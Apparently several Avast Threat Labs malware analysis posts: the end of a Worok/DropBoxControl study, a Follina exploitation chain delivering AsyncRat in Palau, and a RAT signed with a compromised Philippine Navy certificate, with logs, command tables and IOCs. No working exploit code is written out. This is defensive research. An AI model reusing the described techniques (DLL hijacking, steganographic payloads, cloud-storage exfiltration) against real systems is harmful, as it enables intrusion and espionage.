In other words, the whole DropBoxControl project looks like a school project. Authors do not adhere to usual coding practices, rely on their own implementation of common primitives, and reuse code from documentation examples. This leads us to an assessment that DropBoxControl authors are different from authors of CLRLoader and PNGLoader due to significantly different code quality of these payloads.

Conclusion

The purpose of this study has been to confirm the assumptions of our fellow researchers from ESET published in their article about the Worok cyberespionage group. Our research extended their compromise chain, as we found artifacts that fit the chain accompanying the samples in question.

We have described probable scenarios of how the initial compromise can be started by abusing DLL hijacking of Windows services, including lateral movement. The rest of the compromise chain is very similar to the ESET description.

The key finding of this research is the interception of the PNG files, as predicted by ESET. The steganographically embedded C# payload (DropBoxControl) confirms Worok as a cyberespionage group. They steal data via DropBox accounts registered to active Google email accounts.

The prevalence of Worok’s tools in the wild is low, so it can indicate that the toolset is an APT project focusing on high-profile entities in private and public sectors in Asia, Africa, and North America.

Appendix

DropBoxControl Log

[02:00:50]:[+]Main starts.
[02:00:50]:[+]Config exists.
[02:00:50]:[__]DecryptContent is 1,Bearer gg706Xqxhy4*****************gQ8L4OmOLdI1JU1DL**********1ej1_xH7e#,300,7,23
[10:39:40]:[+]In work time.
[10:39:42]:[UPD] UploadData /data/2019/time.txt Starts!
[10:40:08]:[UPD] UploadData /data/2019/time.txt Success!
[10:40:10]:[UPD] UploadData Ends!
[10:40:10]:[+]Get Time.txt success.
[10:40:11]:[+] DropBox_GetFileList Success!
[10:40:11]:[DOWN] DownloadData /data/2019/31-3.req Starts!
[10:40:13]:[DOWN] DownloadData /data/2019/31-3.req Success!
[10:40:13]:[DOWN] DownloadData Ends!
[10:40:26]:[UPD] UploadData /data/2019/31-3.res Starts!
[10:40:27]:[UPD] UploadData /data/2019/31-3.res Success!
[10:40:27]:[UPD] UploadData Ends!
[10:40:27]:[DEL] Delete /data/2019/31-3.req  Starts!
[10:40:28]:[DEL] Delete /data/2019/31-3.req Success!
[10:40:28]:[DEL] Delete Ends!
[10:40:28]:[DOWN] DownloadData /data/2019/31-4.req Starts!
[10:40:29]:[DOWN] DownloadData /data/2019/31-4.req Success!
[10:40:29]:[DOWN] DownloadData Ends!
[10:40:34]:[UPD] UploadData /data/2019/31-4.res Starts!
[10:40:36]:[UPD] UploadData /data/2019/31-4.res Success!
[10:40:36]:[UPD] UploadData Ends!
[10:40:36]:[DEL] Delete /data/2019/31-4.req  Starts!
[10:40:36]:[DEL] Delete /data/2019/31-4.req Success!
[10:40:36]:[DEL] Delete Ends!
[10:40:36]:[DOWN] DownloadData /data/2019/31-5.req Starts!
[10:40:37]:[DOWN] DownloadData /data/2019/31-5.req Success!
[10:40:37]:[DOWN] DownloadData Ends!
[10:40:42]:[UPD] UploadData /data/2019/31-5.res Starts!
[10:40:43]:[UPD] UploadData /data/2019/31-5.res Success!
[10:40:43]:[UPD] UploadData Ends!
[10:40:43]:[DEL] Delete /data/2019/31-5.req  Starts!
[10:40:44]:[DEL] Delete /data/2019/31-5.req Success!
[10:40:44]:[DEL] Delete Ends!
[10:40:44]:[DOWN] DownloadData /data/2019/31-7.req Starts!
[10:40:44]:[DOWN] DownloadData /data/2019/31-7.req Success!
[10:40:44]:[DOWN] DownloadData Ends!
[10:40:49]:[UPD] UploadData /data/2019/31-7.res Starts!
[10:40:50]:[UPD] UploadData /data/2019/31-7.res Success!
[10:40:50]:[UPD] UploadData Ends!
[10:40:50]:[DEL] Delete /data/2019/31-7.req  Starts!
[10:40:52]:[DEL] Delete /data/2019/31-7.req Success!
[10:40:52]:[DEL] Delete Ends!

Task Type Values

Command                 Task Type
Cmd_Request             0x01
Cmd_Response            0x02
Exe_Request             0x03
Exe_Response            0x04
FileUpload_Request      0x05
FileUpload_Response     0x06
FileDownload_Request    0x07
FileDownload_Response   0x08
FileView_Request        0x09
FileView_Response       0x0A
FileDelete_Request      0x0B
FileDelete_Response     0x0C
FileRename_Request      0x0D
FileRename_Response     0x0E
ChangeDir_Request       0x0F
ChangeDir_Response      0x10
Info_Request            0x11
Info_Response           0x12
Config_Request          0x13
Config_Response         0x14

IOCs

PNG file with steganographically embedded C# payload

29A195C5FF1759C010F697DC8F8876541651A77A7B5867F4E160FD8620415977
9E1C5FF23CD1B192235F79990D54E6F72ADBFE29D20797BA7A44A12C72D33B86
AF2907FC02028AC84B1AF8E65367502B5D9AF665AE32405C3311E5597C9C2774

DropBoxControl

1413090EAA0C2DAFA33C291EEB973A83DEB5CBD07D466AFAF5A7AD943197D726

References

[1] Worok: The big picture
[2] Lateral Movement — SCM and DLL Hijacking Primer
[3] Dropbox for HTTP Developers

The post PNG Steganography Hides Backdoor appeared first on Avast Threat Labs.

Outbreak of Follina in Australia

Our threat hunters have been busy searching for abuse of the recently disclosed zero-day remote code execution bug in Microsoft Office (CVE-2022-30190). As part of their investigations, they found evidence of a threat actor hosting malicious payloads on what appears to be an Australian VOIP telecommunications provider with a presence in the South Pacific nation of Palau.

Further analysis indicated that targets in Palau were sent malicious documents that, when opened, exploited this vulnerability, causing victim computers to contact the provider’s website, download and execute the malware, and subsequently become infected.

Key Observations

This threat was a complex multi-stage operation utilizing LOLBAS (Living off the Land Binaries And Scripts), which allowed the attacker to initialize the attack using the CVE-2022-30190 vulnerability in the Microsoft Support Diagnostic Tool. This vulnerability enables threat actors to run malicious code without the user downloading an executable to their machine, which might otherwise be caught by endpoint detection.

Multiple stages of this malware were signed with a legitimate company certificate to add additional legitimacy and minimize the chance of detection.

First stage

The compromised website, pictured in the screenshot below, was used to host an executable disguised as “robots.txt”. We believe the name was chosen so that the file would not stand out if found in network logs. Using the Diagnostics Troubleshooting Wizard (msdt.exe), this “robots.txt” file was downloaded, saved as Sihost.exe, and executed.

Second Stage, Sihost.exe

When the renamed “robots.txt” (“Sihost.exe”) was executed by msdt.exe, it downloaded the second stage of the attack, a loader with the hash b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447. This executable was then used to download and decrypt the third stage of the attack, an encrypted file stored as ‘favicon.svg’ on the same web server.

Third stage, favicon.svg

After this file has been decrypted, it is used to download the fourth stage of the attack from palau.voipstelecom.com[.]au. These files are named Sevntx64.exe and Sevntx64.lnk and are then executed on the victim’s machine.

Fourth Stage, Sevntx64.exe and Sevntx64.lnk

When the file is executed, it loads a 66kb shellcode from the AsyncRat malware family; Sevntx64.exe is signed with the same compromised certificate as seen previously in “robots.txt”.

The screenshot below shows the executable loading the shellcode.

Final Stage, AsyncRat

When the executable is loaded, the machine has been fully compromised with AsyncRat; the trojan is configured to communicate with the server palau[.]voipstelecom[.]com[.]au on port 443.

AsyncRat SHA256:

aba9b566dc23169414cb6927ab5368b590529202df41bfd5dded9f7e62b91479

Screenshot below with AsyncRat configuration:

Conclusion

We highly recommend Avast software to protect against the latest threats, and applying the Microsoft patches to protect your Windows systems from the CVE-2022-30190 vulnerability.

IOCs:

item                                        sha256
main webpage                                0af202af06aef4d36ea151c5a304414a67aee18c3675286275bd01d11a760c04
robots.txt                                  b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447
favicon.svg                                 ed4091700374e007ae478c048734c4bc0b7fe0f41e6d5c611351bf301659eee0
decrypted favicon.svg                       9651e604f972e36333b14a4095d1758b50decda893e8ff8ab52c95ea89bb9f74
Sevntx64.exe                                f3ccf22db2c1060251096fe99464002318baccf598b626f8dbdd5e7fd71fd23f
Sevntx64.lnk                                33297dc67c12c7876b8052a5f490cc6a4c50a22712ccf36f4f92962463eb744d
shellcode from Sevntx64.exe (66814 bytes)   7d6d317616d237ba8301707230abbbae64b2f8adb48b878c528a5e42f419133a
asyncrat                                    aba9b566dc23169414cb6927ab5368b590529202df41bfd5dded9f7e62b91479

Bonus

We managed to find an earlier version of this malware.

file:       Grievance Against Lawyers, Judge or Justice.doc.exe (signed)
hash:       87BD2DDFF6A90601F67499384290533701F5A5E6CB43DE185A8EA858A0604974
first seen: 26.05.2022
country:    NL, proxy

file:       Grievance Against Lawyers, Judge or Justice (1).zip\Grievance Against Lawyers, Judge or Justice.doc.exe
hash:       0477CAC3443BB6E46DE9B904CBA478B778A5C9F82EA411D44A29961F5CC5C842
first seen: 18.05.2022
country:    Palau, previous victim

Forensic information from the lnk file:

field                    value
Application              Sevntx64.exe
Accessed time            2022-05-19 09:34:26
Birth droid MAC address  00:0C:29:59:3C:CC
Birth droid file ID      0e711e902ecfec11954f000c29593ccc
Birth droid volume ID    b097e82425d6c944b33e40f61c831eaf
Creation time            2022-05-19 10:29:34
Drive serial number      0xd4e21f4f
Drive type               DRIVE_FIXED
Droid file ID            0e711e902ecfec11954f000c29593ccc
Droid volume ID          b097e82425d6c944b33e40f61c831eaf
File flags               FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_READONLY
Known folder ID          af2448ede4dca84581e2fc7965083634
Link flags               EnableTargetMetadata, HasLinkInfo, HasRelativePath, HasTargetIDList, HasWorkingDir, IsUnicodeLocal
Base path                C:\Users\Public\Documents\Sevntx64.exe
Location                 Local
MAC address              00:0C:29:59:3C:CC
Machine identifier       desktop-eev1hc3
Modified time            2020-08-19 04:13:44
Relative path            .\Sevntx64.exe
Size                     1543
Target file size         376368
Working directory        C:\Users\Public\Documents

The post Outbreak of Follina in Australia appeared first on Avast Threat Labs.

Avast Finds Compromised Philippine Navy Certificate Used in Remote Access Tool

28 March 2022 at 11:25

The Avast Threat Intelligence Team has found a remote access tool (RAT) actively being used in the wild in the Philippines that uses what appears to be a compromised digital certificate belonging to the Philippine Navy. This certificate is now expired, but we see evidence it was in use with this malware in June 2020.

Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.

We got in touch with CERT-PH, the National Computer Emergency Response Team for the Philippines, to help us contact the navy, and we shared our findings with them. The navy security team later let us know that the incident had been resolved and no further assistance was necessary from our side.

Because this is being used in active attacks now, we are releasing our findings immediately so organizations can take steps to better protect themselves. We have found that this sample is now available on VirusTotal.

Compromised Expired Philippine Navy Digital Certificate

In our analysis we found the sample connects to dost[.]igov-service[.]net:8443 using TLS in a statically linked OpenSSL library.

A WHOIS lookup on the C&C domain gave us the following:

The digital certificate was pinned so that the malware requires the certificate to communicate.

When we checked the digital certificate used for the TLS channel we found the following information:

Some important things to note:

  • Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.
  • While the digital certificate is now expired, we see evidence it was in use with this malware in June 2020.

The malicious PE file was found with the filename C:\Windows\System32\wlbsctrl.dll; its hash is 85FA43C3F84B31FBE34BF078AF5A614612D32282D7B14523610A13944AADAACB.

In analyzing that malicious PE file itself, we found that the compilation timestamp is wrong or was edited. Specifically, the TimeDateStamp of the PE file was modified and set to the year 2004 in both the PE header and Debug Directory as shown below:

However, we found that the author used OpenSSL 1.1.1g and compiled it on April 21, 2020 as shown below:

The username of the author was probably udste. This can be seen in the debug information left inside the used OpenSSL library.

We found that the malware supported the following commands:

  • run shellcode
  • read file
  • write file
  • cancel data transfer
  • list drives
  • rename a file
  • delete a file
  • list directory content

Some additional items of note regarding the malicious PE file:

  • All configuration strings in the malware are encrypted using AES-CBC, with the exception of the mutex it uses. That mutex is used as-is without decryption: t7As7y9I6EGwJOQkJz1oRvPUFx1CJTsjzgDlm0CxIa4=.
  • When this string is decrypted using the hard-coded key, it decrypts to QSR_MUTEX_zGKwWAejTD9sDitYcK. We suspect this is a failed attempt to disguise this malware as the infamous Quasar RAT. But this cannot be the case, because this sample is written in C++ whereas Quasar RAT is written in C#.

Avast customers are protected against this malware.

Indicators of Compromise (IoC)

SHA256                                                            File name
85FA43C3F84B31FBE34BF078AF5A614612D32282D7B14523610A13944AADAACB  C:\Windows\System32\wlbsctrl.dll

Mutex
t7As7y9I6EGwJOQkJz1oRvPUFx1CJTsjzgDlm0CxIa4=

C&C server
dost[.]igov-service[.]net:8443

The post Avast Finds Compromised Philippine Navy Certificate Used in Remote Access Tool appeared first on Avast Threat Labs.
